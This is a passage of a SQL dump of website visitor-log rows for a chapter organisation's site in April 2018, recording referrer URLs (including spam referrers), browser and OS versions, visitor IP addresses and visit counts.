2','000',3,0),(28292,'2018-04-06','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.29','000',1,0),(28293,'2018-04-06','https://zphiblgz.org','Chrome','Macintosh','14.0.835.202','','208.80.194.29','000',1,0),(28294,'2018-04-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','98.130.0.237','000',1,0),(28295,'2018-04-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','74.208.114.75','000',1,0),(28296,'2018-04-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','202.218.79.77','000',1,0),(28297,'2018-04-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','191.252.46.105','000',1,0),(28298,'2018-04-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','50.87.144.137','000',1,0),(28299,'2018-04-06','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1749.b7vekQR___elV-ZN-prDgfbhVNCHxCYeIMsP1xZVphU.a826b6a3ad135e5644aa055f1c8b54ea2cbb4601&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040NmlyM0VNekJGY29CUVpPWjF2SVJMc0pmaFBBYUtiTXYzQWkyZk5ZYV85QSws&sign=e192a77fef80a839b02521b48eef50cb&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','159.89.14.95','000',2,0),(28300,'2018-04-06','https://zphiblgz.org','Firefox','Linux','50.0','','137.226.113.23','000',2,0),(28301,'2018-04-06','https://zphiblgz.org','Chrome','Windows','40.0.2214.85','','138.246.253.19','000',1,0),(28302,'2018-04-06','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1749.E98sRJks6NHmIBZ4Zjeu_lRYGyK3THZSfcNfYLqfs_g.db103c800db5b465b0f28d7817008c8aa276e309&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041YURfcVNJNTRjN1M0QkFGVXUwdklDMTVselZGNjdxcFVneVgwY0MzNFIzUSws&sign=46977a79de9c2d6c39cc3c1ab9d7bdfc&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','165.227.234.98','000',2,0),(28303,'2018-04-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','137.226.113.27','000',4,0),(28304,'2018-04-06','https://zphiblgz.org','Opera','Windows','8.01','','208.80.194.28','000',1,0),(28305,'2018-04-06','http://site.ru','Chrome','Windows','5.0.375.99','','81.23.124.94','000',2,0),(28306,'2018-04-06','https://zphiblgz.org','Chrome','Windows','65.0.3325.181','','208.76.113.2','000',12,0),(28307,'2018-04-06','https://zphiblgz.org/','Chrome','Windows','62.0.3202.94','','62.122.88.181','000',2,0),(28308,'2018-04-06','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1749.bYUdK-j0JRHwhi__F8ZheD6cS2OOle8yKeoN-zJsmSg.78c216273264d2f631547ca2342f0314ed226e84&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042LW50WjRtS09Jd1B4TjUtYXFYQlJTYlkyWGREOWcwZXVxWExRWXZTc3hUZyws&sign=6e1afd399e84b2f40bd17ca22db8901f&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','47.90.122.68','000',2,0),(28309,'2018-04-06','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1749.VCJhRK_gvPx53pYNV6hsnF1rT66-jF2qiVAzLtI3GX8.c896ee07651af6c0ec1038f9fced3e7d3ae11948&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040dExheUtwQlB6eFJLWEVpdXpSbkJwRFJ4b2pRa3dOOXhiZ2ZyV2xBUmdmZyws&sign=58c0ee90cbea35f7b20cddb0d1ce43bc&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','188.226.176.11','000',2,0),(28310,'2018-04-06','https://zphiblgz.org','Firefox','Windows','40.1','','103.83.70.186','000',2,0),(28311,'2018-04-06','https://zphiblgz.org/','Chrome','Windows','61.0.3163.100','','62.122.88.181','000',2,0),(28312,'2018-04-06','https://zphiblgz.org/','Firefox','Windows','56.0','','62.122.88.181','000',2,0),(28313,'2018-04-06','https://zphiblgz.org','Chrome','Windows','56.0.2924.76','','64.74.215.176','000',2,0),(28314,'2018-04-06','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1749.cl3kif2o3QUGeCS2xyQNS8enyfWc9eTqwVq6IY5DSNw.409e51ddca5214670150c560f537764747c1399e&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043ZkVxTkNEOXVYUzk5c2RSbS1jWlVMVlBQYjZ6d0pmT1VUaVR6NzFHNHFqdyws&sign=549ba20a5e618772004abdc8ac521853&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','18.218.212.131','000',2,0),(28315,'2018-04-06','https://zphiblgz.org/scholarship/','AppleWebKit','Windows','534','','65.55.210.0','000',1,0),(28316,'2018-04-06','https://zphiblgz.org','Firefox','Windows','40.1','','84.42.181.212','000',2,0),(28317,'2018-04-06','https://zphiblgz.org','Firefox','Windows','40.1','','92.53.55.139','000',2,0),(28318,'2018-04-06','https://zphiblgz.org','Chrome','Chrome OS','65.0.3325.184','','65.191.71.233','000',17,0),(28319,'2018-04-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','150.95.149.92','000',2,0),(28320,'2018-04-06','https://zphiblgz.org','Edge','Windows','15.15063','','50.225.39.78','000',2,0),(28321,'2018-04-06','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.88.74','000',1,0),(28322,'2018-04-06','https://zphiblgz.org','MSIE','Windows','11.0','','161.69.99.11','000',4,0),(28323,'2018-04-06','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',17,0),(28324,'2018-04-06','https://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.184','000',2,0),(28325,'2018-04-06','http://zahvat.ru/','MSIE','Windows','6.0','','46.119.121.22','000',4,0),(28326,'2018-04-06','https://zphiblgz.org','Chrome','Windows','16.0.912.63','','208.80.194.29','000',1,0),(28327,'2018-04-06','https://zphiblgz.org','Firefox','Macintosh','3.6.11','','208.80.194.28','000',1,0),(28328,'2018-04-06','https://zphiblgz.org','Firefox','Macintosh','3.6.11','','208.80.194.31','000',1,0),(28329,'2018-04-06','https://zphiblgz.org','Firefox','Windows','40.1','','101.163.6.8','000',2,0),(28330,'2018-04-06','http://dnserrorassist.att.net/search/?q=WEW+March+for+Baby+Lambda+Beta+Zeta+Team&t=9','Safari','iPad','11.0','','74.233.145.178','000',2,0),(28331,'2018-04-06','https://zphiblgz.org','Safari','iPhone','11.0','','71.166.46.17','000',2,0),(28332,'2018-04-06','https://zphiblgz.org','Firefox','Windows','5.0','','208.80.194.28','000',1,0),(28333,'2018-04-06','https://zphiblgz.org','Chrome','Linux','12.0.742.112','','208.80.194.28','000',1,0),(28334,'2018-04-06','https://zphiblgz.org','Safari','iPad','11.0','','71.166.46.17','000',7,0),(28335,'2018-04-06','https://zphiblgz.org','Chrome','Windows','10.0.648.151','','208.80.194.27','000',1,0),(28336,'2018-04-06','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.31','000',1,0),(28337,'2018-04-06','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.102.6.108','000',1,0),(28338,'2018-04-06','https://zphiblgz.org','Firefox','Windows','3.6.18','','208.80.194.27','000',1,0),(28339,'2018-04-06','https://zphiblgz.org','Chrome','Windows','11.0.696.68','','208.80.194.27','000',1,0),(28340,'2018-04-06','http://www.zphibmaryland.org/chapters/','Chrome','Windows','65.0.3325.181','','107.181.176.104','000',7,0),(28341,'2018-04-06','https://zphiblgz.org','Opera','Windows','8.01','','208.80.194.31','000',1,0),(28342,'2018-04-06','https://www.google.com/','Safari','iPhone','11.0','','76.78.66.143','000',2,0),(28343,'2018-04-06','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','94.23.1.89','000',2,0),(28344,'2018-04-06','https://zphiblgz.org/','Chrome','Windows','62.0.3202.94','','77.120.125.23','000',2,0),(28345,'2018-04-06','https://www.google.com/','Safari','iPhone','11.0','','68.134.66.188','000',5,0),(28346,'2018-04-06','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','178.62.20.214','000',2,0),(28347,'2018-04-07','https://zphiblgz.org','Chrome','Windows','64.0.3282.119','','144.76.168.111','000',1,0),(28348,'2018-04-07','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.29','000',1,0),(28349,'2018-04-07','https://zphiblgz.org','Firefox','Windows','3.6.23','','208.80.194.29','000',1,0),(28350,'2018-04-07','http://zphiblgz.org/','Safari','Macintosh','11.0.2','','192.210.166.216','000',3,0),(28351,'2018-04-07','http://zphiblgz.org/','Opera','Windows','12.17','','192.210.166.216','000',5,0),(28352,'2018-04-07','http://zphiblgz.org/','PHP','Unknown','Unknown','','192.210.166.216','000',2,0),(28353,'2018-04-07','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.32','000',1,0),(28354,'2018-04-07','https://zphiblgz.org','Firefox','Windows','40.1','','51.252.45.82','000',2,0),(28355,'2018-04-07','http://healbio.ru/','MSIE','Windows','6.0','','178.137.86.152','000',1,0),(28356,'2018-04-07','https://www.google.com/','Chrome','Android','65.0.3325.109','','66.91.243.66','000',3,0),(28357,'2018-04-07','http://www.zphibmaryland.org/chapters/','Chrome','Windows','65.0.3325.181','','107.181.176.98','000',1,0),(28358,'2018-04-07','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.31','000',1,0),(28359,'2018-04-07','https://zphiblgz.org','MSIE','Windows','6.0','','134.119.215.169','000',1,0),(28360,'2018-04-07','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1750.9orZWFboOAyUC3EFUMIdZVQXCjSHBRyqPUpM069MZGw.c458d68c0496ad2c521a2fb9d186a5a9819d6a8e&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042ZkU1TDRvNkZPU25WWURTbUYzaHlFd1dQdHFEeW9JZTl3VnFYUUNCSThLZyws&sign=177b27ad8a1e0e91015fb6ab41e3ea05&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','165.227.46.110','000',2,0),(28361,'2018-04-07','https://zphiblgz.org','Firefox','Windows','40.1','','83.28.69.197','000',2,0),(28362,'2018-04-07','https://zphiblgz.org','Chrome','Linux','12.0.742.100','','208.80.194.29','000',1,0),(28363,'2018-04-07','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1750.n1GtMkovx0Cw1xeGW7EGkxDyDE1qwAHqVLFdNc3qG9Y.8c5d430a093da671ce0c54c953ac3191896ec19f&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041ZlJTRFM2cHRTUHk4TUZlNzFJcWZ6NTFraEp5STliSEMwV1UwTVRUcExhQSws&sign=0734354bd331ee3ac561277cf1dd3627&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','54.255.187.219','000',2,0),(28364,'2018-04-07','https://zphiblgz.org/','Chrome','Windows','62.0.3202.94','','178.172.147.240','000',2,0),(28365,'2018-04-07','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1750.zBHWcxu_SP954g0k9SM-7_7xEMkqTM1tz8Jfx5mA2jc.119d1852b7021c27661323d0460dea29a9e25d86&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041X1dxal9DODd1OVF0Z3VqM3JuWXlkVmtCbkF6ZFlpRDg4UUl0ZlRmVlhvQSws&sign=6bf8fb2588f50340dd4b3a1549a07d1a&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','188.226.164.247','000',2,0),(28366,'2018-04-07','https://zphiblgz.org','Chrome','Macintosh','11.0.696.68','','208.80.194.29','000',1,0),(28367,'2018-04-07','http://site.ru','Chrome','Windows','5.0.375.99','','195.26.90.53','000',1,0),(28368,'2018-04-07','http://xn----7sbabn5abjehfwi8bj.xn--p1ai/','Unknown','Unknown','Unknown','','46.119.121.22','000',1,0),(28369,'2018-04-07','https://zphiblgz.org/service/','AppleWebKit','Windows','534','','199.30.25.233','000',1,0),(28370,'2018-04-07','https://zphiblgz.org','Firefox','Linux','3.6.11','','208.80.194.29','000',1,0),(28371,'2018-04-07','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1750.7HQjyo4gcgRjp-1bDnf50MFZW-GFUXLVoBOqUCdBc3U.71203e00d08d27a1f4ad5cf7e6c6e538bffe3da6&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042S0FCZGJkakdXQW9ZRDVES3hobkxwRkN1dUJ2eFlQUW1HaWxHQ3g2Z1c4dyws&sign=59ff1c5667b0da19b00d3ae37cd3b6a8&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','198.199.101.105','000',2,0),(28372,'2018-04-07','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.31','000',1,0),(28373,'2018-04-07','https://zphiblgz.org','Chrome','Linux','12.0.742.100','','208.80.194.31','000',1,0),(28374,'2018-04-07','http://skinali.photo-clip.ru/','Opera','Windows','8.01','','46.118.127.172','000',3,0),(28375,'2018-04-07','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1750.2_q0D01UUmycmSsn8PKrYk3g-ydrMQZgRNiVBK6wasU.ca667dbf8213e4c2a496b2753c6d3d153a517df1&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042V3pOLUVkbG9oSkxMdk9pellUbVI5ZGs0Sy1zZDRvaUhVbE04SXo4MmgtUSws&sign=a83552c325554b89b23a46243f9a9865&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','165.227.236.249','000',2,0),(28376,'2018-04-07','https://sovetskie-plakaty.ru/','MSIE','Unknown','6.0','','178.159.37.55','000',3,0),(28377,'2018-04-07','http://komp-pomosch.ru/','MSIE','Windows','4.01','','46.118.127.172','000',2,0),(28378,'2018-04-07','http://atyrau.xkaz.org/','Opera','Windows','7.60','','178.137.86.152','000',3,0),(28379,'2018-04-07','https://zphiblgz.org','Chrome','Linux','12.0.742.100','','208.80.194.27','000',1,0),(28380,'2018-04-07','https://zphiblgz.org','Chrome','Windows','9.0.597.94','','208.80.194.27','000',1,0),(28381,'2018-04-07','http://m.facebook.com','AppleWebKit','iPhone','604.5.6','','174.205.4.44','000',2,0),(28382,'2018-04-07','https://www.google.com/','Chrome','iPad','63.0.3239.73','','72.81.217.135','000',1,0),(28383,'2018-04-07','https://zphiblgz.org','Safari','Macintosh','11.0.3','','71.179.81.192','000',12,0),(28384,'2018-04-07','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','192.126.156.130','000',1,0),(28385,'2018-04-07','https://zphiblgz.org','Opera','Windows','8.50','','192.126.156.130','000',1,0),(28386,'2018-04-07','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',3,0),(28387,'2018-04-07','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.210','000',2,0),(28388,'2018-04-07','http://zphiblgz.org/','Chrome','Windows','32.0.1700.107','','195.22.125.74','000',3,0),(28389,'2018-04-07','http://zphiblgz.org/','Firefox','Windows','32.1','','37.115.155.222','000',3,0),(28390,'2018-04-07','https://buy-meds24.com/cialis-fr.html','Unknown','Unknown','Unknown','','46.118.127.172','000',1,0),(28391,'2018-04-07','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.31','000',1,0),(28392,'2018-04-07','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.27','000',1,0),(28393,'2018-04-07','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.27','000',1,0),(28394,'2018-04-07','https://eduinfosite.com/','MSIE','Windows','6.0','','134.249.55.53','000',2,0),(28395,'2018-04-07','https://zphiblgz.org','Firefox','Windows','4.0.1','','208.80.194.31','000',1,0),(28396,'2018-04-07','http://autoblog.org.ua/','MSIE','Windows','6.0','','178.159.37.55','000',3,0),(28397,'2018-04-07','http://zphiblgz.org/','Trident','Unknown','5.0','','180.153.236.117','000',2,0),(28398,'2018-04-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','150.95.214.192','000',2,0),(28399,'2018-04-08','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','35.178.21.187','000',2,0),(28400,'2018-04-08','https://kozhasobak.com/','MSIE','Windows','7.0a1','','134.249.55.53','000',1,0),(28401,'2018-04-08','https://www.google.com/','SamsungBrowser','Android','7.0','','74.77.114.14','000',2,0),(28402,'2018-04-08','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.28','000',1,0),(28403,'2018-04-08','https://zphiblgz.org','Chrome','Linux','12.0.742.100','','208.80.194.32','000',1,0),(28404,'2018-04-08','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.32','000',1,0),(28405,'2018-04-08','https://zphiblgz.org','Chrome','Macintosh','44.0.2403.89','','54.189.183.83','000',3,0),(28406,'2018-04-08','https://zphiblgz.org/','Chrome','Windows','62.0.3202.94','','5.248.253.101','000',1,0),(28407,'2018-04-08','http://zphiblgz.org','MSIE','Windows','9.0','','107.178.194.43','000',1,0),(28408,'2018-04-08','https://zphiblgz.org','Firefox','Windows','40.1','','176.216.41.224','000',2,0),(28409,'2018-04-08','https://zphiblgz.org','Chrome','Windows','56.0.2924.76','','64.74.215.58','000',3,0),(28410,'2018-04-08','https://zphiblgz.org','Chrome','Windows','56.0.2924.76','','64.74.215.142','000',3,0),(28411,'2018-04-08','https://zphiblgz.org','Chrome','Macintosh','62.0.3202.89','','104.131.19.168','000',6,0),(28412,'2018-04-08','https://zphiblgz.org','Chrome','Windows','56.0.2924.76','','64.74.215.1','000',3,0),(28413,'2018-04-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','211.55.19.11','000',1,0),(28414,'2018-04-08','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.27','000',2,0),(28415,'2018-04-08','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1751.SYkrOixwkmcYZz6eSIbL9lgOqY0N5BfqeRHcg4Y2P_o.02e1974a2cd927000f1d5f67be596b8fe1fae89c&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042dUpJcGwwNVl4UTJVeGVHc3IybFJEeGpUZUc0SkZzTFY0VFR6MGw4OTh6USws&sign=cfbf32fc7ecc0e5edfe0df290589b649&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','165.227.234.42','000',2,0),(28416,'2018-04-08','https://zphiblgz.org','Chrome','Linux','12.0.742.112','','188.165.208.29','000',2,0),(28417,'2018-04-08','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1751.3AUnl3h7jaNHO0ykIgklZcZF0S-g8XABHThKFAmBQno.7d477f9033eeb7ff7d883f5c03190675e078e4fb&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041U0RsVDhoaENMdjhxNkphRmluSjlvT3k5M0l2VjVDSlNtd0lyVVU2UFE2USws&sign=396eff9d7283965be808b8ff1239a6bc&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','207.148.75.154','000',2,0),(28418,'2018-04-08','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1751.ZJTlxji4UMOKsq8iUODjaRZsry64wgfo_tJJyYUxQe4.b6216a804d11813d4db61a297863f4d0321805bd&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042VVR0U2RYZ0ZrdFJTcEJMQ0w2dERsWjRxek5oSUFIQTNERFlLVzkxa0cydyws&sign=aa86a1cfff149939fe56704b100585a9&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','159.89.96.49','000',2,0),(28419,'2018-04-08','https://zphiblgz.org','Chrome','Windows','65.0.3325.146','','184.154.189.94','000',1,0),(28420,'2018-04-08','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1751.09tWhzwCtjydX_JIZDHtyGxsQpLbUewDp_WALDHqYNM.84b01724e7887b1c92c7f13a893021db549e2af3&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041UjltY09HMWNOOGFwU05aeElYWVdaMVBQZkc1aFdGX1pYRng2WklVWE1XUSws&sign=ba000e289f749c20fdcf80efe0797b9a&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','165.227.33.188','000',2,0),(28421,'2018-04-08','http://site.ru','Chrome','Windows','5.0.375.99','','37.187.152.179','000',2,0),(28422,'2018-04-08','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.67.59.131','000',2,0),(28423,'2018-04-08','http://03e.info/','MSIE','Windows','5.5','','178.159.37.55','000',3,0),(28424,'2018-04-08','https://zphiblgz.org','Chrome','Windows','65.0.3325.181','','76.106.122.110','000',1,0),(28425,'2018-04-08','https://zphiblgz.org','Chrome','Macintosh','11.0.696.68','','208.80.194.32','000',1,0),(28426,'2018-04-08','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1751.MzeYYrNO0cNW5NL6rKYHozrN1fawGW9SajOSZ3Kcops.f2993802fe254da474b9a93eec0e363e3b7f8672&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043TGlwa3RrM2kyMC1VN2JKRTZqTElhbHZHc3Y1MU1WUGZyZE9XTUNlVWV3USws&sign=7016944d6229832fd0d1fb86923a8905&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','128.199.35.20','000',2,0),(28427,'2018-04-08','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.183.165.74','000',2,0),(28428,'2018-04-08','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1751.PKYvFTZAppTUlCeuPRiJIOZ65GWEf-vl-F3t0ki6OM4.912541c31bd7d993f96e823ed85ae27b6181dde1&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040Qk83Y2ItRnozc0paeVZPRmNFTERUbk14dDNiNGVycXFmMXZsWXFjTk54QSws&sign=d7fa71843892dcce183425b6c245941e&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','198.199.111.208','000',2,0),(28429,'2018-04-08','http://pk-services.ru/','MSIE','Windows','6.0','','46.119.121.22','000',4,0),(28430,'2018-04-08','https://zphiblgz.org','MSIE','Windows','7.0','','216.163.176.52','000',2,0),(28431,'2018-04-08','https://zphiblgz.org','Firefox','Windows','40.1','','118.100.87.213','000',2,0),(28432,'2018-04-08','https://zphiblgz.org','AppleWebKit','Macintosh','603.3.8','','54.201.9.104','000',2,0),(28433,'2018-04-08','https://zphiblgz.org','Firefox','Windows','40.1','','41.199.107.156','000',2,0),(28434,'2018-04-08','https://picturesmania.com/','MSIE','Windows','6.0','','178.137.86.152','000',3,0),(28435,'2018-04-08','https://zphiblgz.org','Chrome','Macintosh','52.0.2743.116','','54.153.123.117','000',3,0),(28436,'2018-04-08','https://zphiblgz.org','MSIE','Windows','11.0','','161.69.99.11','000',4,0),(28437,'2018-04-08','https://zphiblgz.org/event/a-pretty-polished-affair/','AppleWebKit','Windows','534','','40.77.179.90','000',2,0),(28438,'2018-04-08','https://www.google.com/','Chrome','Windows','65.0.3325.181','','173.64.98.182','000',13,0),(28439,'2018-04-08','https://zphiblgz.org','Safari','Macintosh','11.0.1','','148.251.54.44','000',1,0),(28440,'2018-04-08','https://zphiblgz.org','Safari','iPhone','7.0','','65.55.210.127','000',1,0),(28441,'2018-04-08','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',3,0),(28442,'2018-04-08','https://zphiblgz.org','Chrome','Windows','65.0.3325.181','','96.5.121.250','000',4,0),(28443,'2018-04-08','http://www.regionshop.biz/','MSIE','Windows','6.0','','46.118.127.172','000',3,0),(28444,'2018-04-08','https://www.google.com/','Safari','iPhone','11.0','','172.58.173.188','000',3,0),(28445,'2018-04-08','https://zphiblgz.org','MSIE','Windows','6.0','','204.101.161.159','000',1,0),(28446,'2018-04-08','http://www.google.com/','Chrome','Android','65.0.3325.109','','172.58.185.155','000',4,0),(28447,'2018-04-08','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.29','000',1,0),(28448,'2018-04-08','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.29','000',1,0),(28449,'2018-04-08','https://zphiblgz.org','Chrome','Windows','14.0.835.187','','208.80.194.27','000',1,0),(28450,'2018-04-08','https://www.google.com/','Edge','Windows','16.16299','','71.121.248.17','000',5,0),(28451,'2018-04-08','https://zphiblgz.org','MSIE','Windows','11.0','','173.64.85.9','000',4,0),(28452,'2018-04-08','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.35','000',1,0),(28453,'2018-04-08','https://zphiblgz.org','Firefox','Windows','3.6.18','','208.80.194.31','000',1,0),(28454,'2018-04-08','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.27','000',1,0),(28455,'2018-04-08','https://zphiblgz.org','Opera','Windows','8.01','','208.80.194.27','000',1,0),(28456,'2018-04-08','https://www.google.com/','Safari','iPhone','604.1','','68.134.38.48','000',2,0),(28457,'2018-04-08','https://zphiblgz.org','Chrome','Macintosh','39.0.2211.12','','23.94.151.60','000',2,0),(28458,'2018-04-08','https://zphiblgz.org','python-requests','Unk